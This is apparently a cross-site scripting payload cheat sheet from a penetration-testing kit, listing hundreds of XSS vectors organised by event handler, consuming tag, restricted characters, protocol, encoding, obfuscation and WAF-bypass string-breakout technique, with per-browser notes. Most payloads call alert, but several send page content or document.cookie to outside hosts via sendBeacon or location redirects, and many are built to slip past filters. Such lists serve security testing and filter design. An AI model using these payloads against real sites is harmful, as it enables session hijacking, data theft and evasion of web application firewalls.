WAFbypass.txt

OWASP Penetration Testing Kit
 
Event handlers
onafterprint
Fires after the page is printed

<body onafterprint=alert(1)>
onafterscriptexecute
Fires after script is executed

<xss onafterscriptexecute=alert(1)><script>1</script>
onanimationcancel
Fires when a CSS animation cancels

<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="print()"></xss>
onanimationend
Fires when a CSS animation ends

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
onanimationiteration
Fires when a CSS animation repeats

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
onanimationstart
Fires when a CSS animation starts

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
onauxclick
Fires when right clicking or using the middle button of the mouse

<input onauxclick=alert(1)>
onbeforecopy
Requires you copy a piece of text

<input onbeforecopy=alert(1) value="XSS" autofocus>
onbeforecut
Requires you cut a piece of text

<input onbeforecut=alert(1) value="XSS" autofocus>
onbeforeinput
Fires when the value of the element is about to be modified

<xss contenteditable onbeforeinput=alert(1)>test
onbeforeprint
Fires before the page is printed

<body onbeforeprint=console.log(1)>
onbeforescriptexecute
Fires before script is executed

<xss onbeforescriptexecute=alert(1)><script>1</script>
onbeforetoggle
Fires before the a popop element is toggled

<button popovertarget=x>Click me</button><xss onbeforetoggle=alert(1) popover id=x>XSS</xss>
onbeforeunload
Fires after if the url changes

<body onbeforeunload=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onbegin
Fires when a svg animation begins

<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1">
onblur
Fires when an element loses focus

<xss onblur=alert(1) id=x tabindex=1 style=display:block>test</xss><input value=clickme>
onbounce
Fires when the marquee bounces

<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
oncanplay
Fires if the resource can be played

<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
oncanplaythrough
Fires when enough data has been loaded to play the resource all the way through

<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onchange
Requires as change of value

<input onchange=alert(1) value=xss>
onclick
Requires a click of the element

<xss onclick="alert(1)" style=display:block>test</xss>
onclose
Fires when a dialog is closed

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu
Triggered when right clicking to show the context menu

<xss oncontextmenu="alert(1)" style=display:block>test</xss>
oncopy
Requires you copy a piece of text

<xss oncopy=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test
oncuechange
Fires when subtitle changes

<video controls><source src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
oncut
Requires you cut a piece of text

<xss oncut=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test
ondblclick
Triggered when double clicking the element

<xss ondblclick="alert(1)" autofocus tabindex=1 style=display:block>test</xss>
ondrag
Triggered dragging the element

<xss draggable="true" ondrag="alert(1)" style=display:block>test</xss>
ondragend
Triggered dragging is finished on the element

<xss draggable="true" ondragend="alert(1)" style=display:block>test</xss>
ondragenter
Requires a mouse drag

<xss draggable="true" ondragenter="alert(1)" style=display:block>test</xss>
ondragexit
Triggered when dragging the element

<xss draggable="true" ondragexit="alert(1)" style=display:block>test</xss>
ondragleave
Requires a mouse drag

<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>
ondragover
Triggered dragging over an element

<div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable style=display:block>drop here</xss>
ondragstart
Requires a mouse drag

<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
ondrop
Triggered dropping a draggable element

<div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable style=display:block>drop here</xss>
ondurationchange
Fires when duration changes

<video controls ondurationchange=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
onend
Fires when a svg animation ends

<svg><animate onend=alert(1) attributeName=x dur=1s>
onended
Fires when the resource is finished playing

<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onerror
Fires when the resource fails to load or causes an error

<body onerror=alert(1) onload=/>
onfinish
Fires when the marquee finishes

<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
onfocus
Fires when the element has focus

<input autofocus onfocus=alert(1)>
onfocusin
Fires when the element has focus

<input autofocus onfocusin=alert(1)>
onfocusout
Fires when an element loses focus

<xss onfocusout=alert(1) autofocus tabindex=1 style=display:block>test</xss><input value=clickme>
onformdata
Triggered when a form is submitted

<form onformdata="alert(1)"><button>Click</button></form>
onfullscreenchange
Fires when a video changes full screen status

<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
onhashchange
Fires if the hash changes

<body onhashchange="print()">
oninput
Requires as change of value

<input oninput=alert(1) value=xss>
oninvalid
Requires a form submission with an element that does not satisfy its constraints such as a required attribute.

<form><input oninvalid=alert(1) required><input type=submit>
onkeydown
Triggered when a key is pressed

<xss onkeydown="alert(1)" contenteditable style=display:block>test</xss>
onkeypress
Triggered when a key is pressed

<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>
onkeyup
Triggered when a key is released

<xss onkeyup="alert(1)" contenteditable style=display:block>test</xss>
onload
Fires when the element is loaded

<body onload=alert(1)>
onloadeddata
Fires when the first frame is loaded

<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onloadedmetadata
Fires when the meta data is loaded

<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video>
onloadstart
Triggered video is loaded

<video onloadstart="alert(1)"><source></*>
onmessage
Fires when message event is received from a postMessage call

<body onmessage=print()>
onmousedown
Triggered when the mouse is pressed

<xss onmousedown="alert(1)" style=display:block>test</xss>
onmouseenter
Triggered when the mouse is hovered over the element

<xss onmouseenter="alert(1)" style=display:block>test</xss>
onmouseleave
Triggered when the mouse is moved away from the element

<xss onmouseleave="alert(1)" style=display:block>test</xss>
onmousemove
Requires mouse movement

<xss onmousemove="alert(1)" style=display:block>test</xss>
onmouseout
Triggered when the mouse is moved away from the element

<xss onmouseout="alert(1)" style=display:block>test</xss>
onmouseover
Requires a hover over the element

<xss onmouseover="alert(1)" style=display:block>test</xss>
onmouseup
Triggered when the mouse button is released

<xss onmouseup="alert(1)" style=display:block>test</xss>
onmousewheel
Fires when the mousewheel scrolls

<xss onmousewheel=alert(1) style=display:block>requires scrolling
onmozfullscreenchange
Fires when a video changes full screen status

<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
onpagehide
Fires when the page is changed

<body onpagehide=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onpageshow
Fires when the page is shown

<body onpageshow=alert(1)>
onpaste
Requires you paste a piece of text

<input onpaste=alert(1) value="" autofocus>
onpause
Requires clicking the element to pause

<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onplay
Fires when the resource is played

<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onplaying
Fires the resource is playing

<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onpointerdown
Fires when the mouse down

<xss onpointerdown=alert(1) style=display:block>XSS</xss>
onpointerenter
Fires when the mouseenter

<xss onpointerenter=alert(1) style=display:block>XSS</xss>
onpointerleave
Fires when the mouseleave

<xss onpointerleave=alert(1) style=display:block>XSS</xss>
onpointermove
Fires when the mouse move

<xss onpointermove=alert(1) style=display:block>XSS</xss>
onpointerout
Fires when the mouse out

<xss onpointerout=alert(1) style=display:block>XSS</xss>
onpointerover
Fires when the mouseover

<xss onpointerover=alert(1) style=display:block>XSS</xss>
onpointerrawupdate
Fires when the pointer changes

<xss onpointerrawupdate=alert(1) style=display:block>XSS</xss>
onpointerup
Fires when the mouse up

<xss onpointerup=alert(1) style=display:block>XSS</xss>
onpopstate
Fires when the history changes

<body onpopstate=print()>
onprogress
Fires when the video/audio begins downloading

<video controls onprogress=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
onratechange
Fires when the speed of the video changes

<video controls autoplay onratechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onrepeat
Fires when a svg animation repeats

<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
onreset
Requires a click

<form onreset=alert(1)><input type=reset>
onresize
Fires when the window is resized

<body onresize="print()">
onscroll
Fires when the page scrolls

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
onscrollend
Fires when the scrolling to the end of the element

<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>
onsearch
Fires when a form is submitted and the input has a type attribute of search

<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked
Requires clicking the element timeline

<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking
Requires clicking the element timeline

<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onselect
Requires you select text

<input onselect=alert(1) value="XSS" autofocus>
onselectionchange
Fires when text selection is changed on the page

<body onselectionchange=alert(1)>select some text
onselectstart
Fires when beginning a text selection

<body onselectstart=alert(1)>select some text
onshow
Fires context menu is shown

<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onstart
Fires when the marquee starts

<marquee onstart=alert(1)>XSS</marquee>
onsubmit
Requires a form submission

<form onsubmit=alert(1)><input type=submit>
onsuspend
Fires when the video/audio when the data loading is suspended

<video controls onsuspend=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
ontimeupdate
Fires when the timeline is changed

<video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
ontoggle
Fires when the details tag is expanded

<details ontoggle=alert(1) open>test</details>
ontoggle(popover)
Fires when the a popop element is toggled

<button popovertarget=x>Click me</button><xss ontoggle=alert(1) popover id=x>XSS</xss>
ontouchend
Fires when the touch screen, only mobile device

<body ontouchend=alert(1)>
ontouchmove
Fires when the touch screen and move, only mobile device

<body ontouchmove=alert(1)>
ontouchstart
Fires when the touch screen, only mobile device

<body ontouchstart=alert(1)>
ontransitioncancel
Fires when a CSS transition cancels

<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=print()></xss>
ontransitionend
Fires when a CSS transition ends

<xss id=x style="transition:outline 1s" ontransitionend=alert(1) tabindex=1></xss>
ontransitionrun
Fires when a CSS transition begins

<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=print()></xss>
ontransitionstart
Fires when a CSS transition starts

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
onunhandledrejection
Fires when a promise isn't handled

<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
onunload
Fires when the page is unloaded

<svg onunload=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onvolumechange
Requires volume adjustment

<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onwebkitanimationend
Fires when a CSS animation ends

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
onwebkitanimationiteration
Fires when a CSS animation repeats

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
onwebkitanimationstart
Fires when a CSS animation starts

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>
onwebkittransitionend
Fires when a CSS transition ends

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
onwheel
Fires when you use the mouse wheel

<body onwheel=alert(1)>
 
Consuming tags
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
Noembed consuming tag

chrome,firefox,safari

<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
Noscript consuming tag

chrome,firefox,safari

<style><img title="</style><img src onerror=alert(1)>"></style>
Style consuming tag

chrome,firefox,safari

<script><img title="</script><img src onerror=alert(1)>"></script>
Script consuming tag

chrome,firefox,safari

<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
iframe consuming tag

chrome,firefox,safari

<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>
xmp consuming tag

chrome,firefox,safari

<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
textarea consuming tag

chrome,firefox,safari

<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>
noframes consuming tag

chrome,firefox,safari

<title><img title="</title><img src onerror=alert(1)>"></title>
Title consuming tag

chrome,firefox,safari

 
Restricted characters
<script>onerror=alert;throw 1</script>
No parentheses using exception handling

chrome,firefox,safari

<script>{onerror=alert}throw 1</script>
No parentheses using exception handling no semi colons

chrome,firefox,safari

<script>throw onerror=alert,1</script>
No parentheses using exception handling no semi colons using expressions

chrome,firefox,safari

<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses using exception handling and string eval on Chrome / Edge

chrome

<script>throw onerror=eval,'alert\x281\x29'</script>
No parentheses using exception handling and string eval on Safari

safari

<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses using exception handling and object eval on Firefox

firefox

<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>
No parentheses using exception handling and object eval on Firefox / Safari

firefox,safari

<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!window.InstallTrigger?e:e.message</script>
No parentheses using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>throw{},onerror=Uncaught=eval,h=location.hash,e={lineNumber:1,columnNumber:1,fileName:0,message:h[2]+h[1]+h},!!window.InstallTrigger?e:e.message</script>
No parentheses, no quotes, no spaces using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>
No parentheses, no quotes, no spaces, no curly brackets using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses using ES6 hasInstance and instanceof with eval

chrome,firefox,safari

<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses using ES6 hasInstance and instanceof with eval without .

chrome,firefox,safari

<script>location='javascript:alert\x281\x29'</script>
No parentheses using location redirect

chrome,firefox,safari

<script>location=name</script>
No parentheses using location redirect no strings

chrome,firefox,safari

<script>alert`1`</script>
No parentheses using template strings

chrome,firefox,safari

<script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses using template strings and location hash

chrome,firefox,safari

<script>Function`X${document.location.hash.substr`1`}```</script>
No parentheses or spaces, using template strings and location hash

chrome,firefox,safari

<video><source onerror=location=/\02.rs/+document.cookie>
XSS cookie exfiltration without parentheses, backticks or quotes

chrome,firefox,safari

<svg onload=alert(1)
XSS without greater than

chrome,firefox,safari

<svg onload=alert(1)<!--
XSS without greater using a HTML comment

chrome,firefox,safari

<script>throw[onerror]=[alert],1</script>
Array based destructuring using onerror

chrome,firefox,safari

<script>var{a:onerror}={a:alert};throw 1</script>
Destructuring using onerror

chrome,firefox,safari

<script>var{haha:onerror=alert}=0;throw 1</script>
Destructuring using default values and onerror

chrome,firefox,safari

<script>window.name='javascript:alert(1)';</script><svg onload=location=name>
Vector using window.name

chrome,firefox,safari

<script>window.name='javascript:alert(1)';function blah(){} blah(""+{a:location=name}+"")</script>
Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using object literal

chrome,firefox,safari

<script>window.name='javascript:alert(1)';function blah(){} blah(""+new class b{toString=e=>location=name}+"")</script>
Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using new class

chrome,firefox,safari

 
Protocols
<iframe src="javascript:alert(1)">
Iframe src attribute JavaScript protocol

chrome,firefox,safari

<object data="javascript:alert(1)">
Object data attribute with JavaScript protocol

firefox

<embed src="javascript:alert(1)">
Embed src attribute with JavaScript protocol

firefox

<a href="javascript:alert(1)">XSS</a>
A standard JavaScript protocol

chrome,firefox,safari

<a href="JaVaScript:alert(1)">XSS</a>
The protocol is not case sensitive

chrome,firefox,safari

<a href=" javascript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol

chrome,firefox,safari

<a href="javas cript:alert(1)">XSS</a>
Characters \x09,\x0a,\x0d are allowed inside the protocol

chrome,firefox,safari

<a href="javascript :alert(1)">XSS</a>
Characters \x09,\x0a,\x0d are allowed after protocol name before the colon

chrome,firefox,safari

<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
Xlink namespace inside SVG with JavaScript protocol

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using values

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to

chrome,firefox,safari

<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag

chrome,firefox,safari

<script src="data:text/javascript,alert(1)"></script>
Data protocol inside script src

chrome,firefox,safari

<svg><script href="data:text/javascript,alert(1)" />
SVG script href attribute without closing script tag

firefox

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
SVG use element Chrome/Firefox

chrome,firefox

<script>import('data:text/javascript,alert(1)')</script>
Import statement with data URL

chrome,firefox,safari

<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
Base tag with JavaScript protocol rewriting relative URLS

safari

<math><x href="javascript:alert(1)">blah
MathML makes any tag clickable

firefox

<form><button formaction=javascript:alert(1)>XSS
Button and formaction

chrome,firefox,safari

<form><input type=submit formaction=javascript:alert(1) value=XSS>
Input and formaction

chrome,firefox,safari

<form action=javascript:alert(1)><input type=submit value=XSS>
Form and action

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://example.com?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Animate tag with keytimes and multiple values

chrome,firefox,safari

<a href="javascript://%0aalert(1)">XSS</a>
JavaScript protocol with new line

chrome,firefox,safari

<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg>
Data URL with use element and base64 encoded

chrome,firefox

<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
Data URL with use element

chrome,firefox

<svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" /><use id=x />
Animate tag with auto executing use element

chrome,firefox

<embed code=https://example.com width=500 height=500 type=text/html>
Embed supports code attribute

chrome

<object width=500 height=500 type=text/html><param name=url value=https://example.com>
Object tag supports param url

chrome

<object width=500 height=500 type=text/html><param name=code value=https://example.com>
Object tag supports param code

chrome

<object width=500 height=500 type=text/html><param name=movie value=https://example.com>
Object tag supports param movie

chrome

<object width=500 height=500 type=text/html><param name=src value=https://example.com>
Object tag supports param src

chrome

<script>location.protocol='javascript'</script>
Assignable protocol with location

chrome,safari

<a href="%0aalert(1)" onclick="protocol='javascript'">test</a>
Assignable protocol with anchor

chrome,safari

<script>navigation.navigate('javascript:alert(1)')</script>
Navigation navigate method

chrome

 
Encoding
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>
Overlong UTF-8

chrome,firefox,safari

<script>\u0061lert(1)</script>
Unicode escapes

chrome,firefox,safari

<script>\u{61}lert(1)</script>
Unicode escapes ES6 style

chrome,firefox,safari

<script>\u{0000000061}lert(1)</script>
Unicode escapes ES6 style zero padded

chrome,firefox,safari

<script>eval('\x61lert(1)')</script>
Hex encoding JavaScript escapes

chrome,firefox,safari

<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Octal encoding

chrome,firefox,safari

<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>
Decimal encoding with optional semi-colon

chrome,firefox,safari

<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
SVG script with HTML encoding

chrome,firefox,safari

<a href="&#0000106avascript:alert(1)">XSS</a>
Decimal encoding with padded zeros

chrome,firefox,safari

<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding entities

chrome,firefox,safari

<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>
Hex encoding without semi-colon provided next character is not a-f0-9

chrome,firefox,safari

<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding with padded zeros

chrome,firefox,safari

<a href="&#X6A;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive

chrome,firefox,safari

<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
HTML entities

chrome,firefox,safari

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
URL encoding

chrome,firefox,safari

<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
HTML entities and URL encoding

chrome,firefox,safari

 
Obfuscation
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64

chrome,firefox,safari

<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
Data protocol inside script src with base64 and HTML entities

chrome,firefox,safari

<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
Data protocol inside script src with base64 and URL encoding

chrome,firefox,safari

<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
Iframe srcdoc HTML encoded

chrome,firefox,safari

<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
Iframe JavaScript URL with HTML and URL encoding

chrome,firefox,safari

<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
SVG script with unicode escapes and HTML encoding

chrome,firefox,safari

<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
Img tag with base64 encoding

chrome,firefox,safari

 
WAF bypass global objects
';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (window)

chrome,firefox,safari

';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (self)

chrome,firefox,safari

';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (this)

chrome,firefox,safari

';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (top)

chrome,firefox,safari

';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (parent)

chrome,firefox,safari

';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (frames)

chrome,firefox,safari

';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (globalThis)

chrome,firefox,safari

';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (window)

chrome,firefox,safari

';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (self)

chrome,firefox,safari

';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (this)

chrome,firefox,safari

';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (top)

chrome,firefox,safari

';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (parent)

chrome,firefox,safari

';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (frames)

chrome,firefox,safari

';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (globalThis)

chrome,firefox,safari

';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (window)

chrome,firefox,safari

';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (self)

chrome,firefox,safari

';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (this)

chrome,firefox,safari

';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (top)

chrome,firefox,safari

';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (parent)

chrome,firefox,safari

';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (frames)

chrome,firefox,safari

';globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (globalThis)

chrome,firefox,safari

';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (window)

chrome,firefox,safari

';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (self)

chrome,firefox,safari

';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (this)

chrome,firefox,safari

';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)

chrome,firefox,safari

';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent)

chrome,firefox,safari

';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames)

chrome,firefox,safari

';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis)

chrome,firefox,safari

';window['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (window)

chrome,firefox,safari

';self['\141\154\145\162\164']('\130\123\123');//
